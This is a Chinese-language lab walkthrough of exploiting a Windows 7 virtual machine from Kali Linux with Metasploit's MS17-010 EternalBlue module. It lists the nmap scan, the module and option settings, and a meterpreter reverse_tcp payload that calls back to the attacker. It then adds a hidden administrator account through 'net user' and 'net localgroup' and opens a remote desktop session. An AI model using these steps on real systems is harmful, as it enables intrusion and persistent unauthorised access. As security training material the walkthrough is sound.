一、打开kali和win7查看IP。
(1) Windows7作为靶机
IP:192.168.43.109
(2) Kali作为攻击机(最新版kaili)
IP:192.168.43.49
二、打开kali进入终端输入nmap +IP查看靶机是否开启445端口。
三、在kali中输入 msfconsole(等待一会可能会有点慢)
四、进入后输人search ms17-010(搜素攻击模块)
五、找到exploit windows/smb/ms17_010_eternalblue,
运行use exploitwindows/smb/ms17_010_eternalblue
-
使用show options 或者options查看选项设置
可以使用show targets来查看可以攻击的系统版本
使用show payloads可以加载所有可以使用的攻击向量
六、输入show options 查看和配置RHOST(靶机)和LHOST(操作机)
七、设置TCP连接 set payload windows/x64/meterpreter/reverse_tcp
八、run或exploit进行攻击
九、进如目标机终端
十、可以创建用户 net user xxxx 1234 /add(xxxx用户名 1234密码)
十一、net localgroup administrators xxxx /add (将用户设置为管理员权限)
十二、重新打开一个终端 rdesktop+IP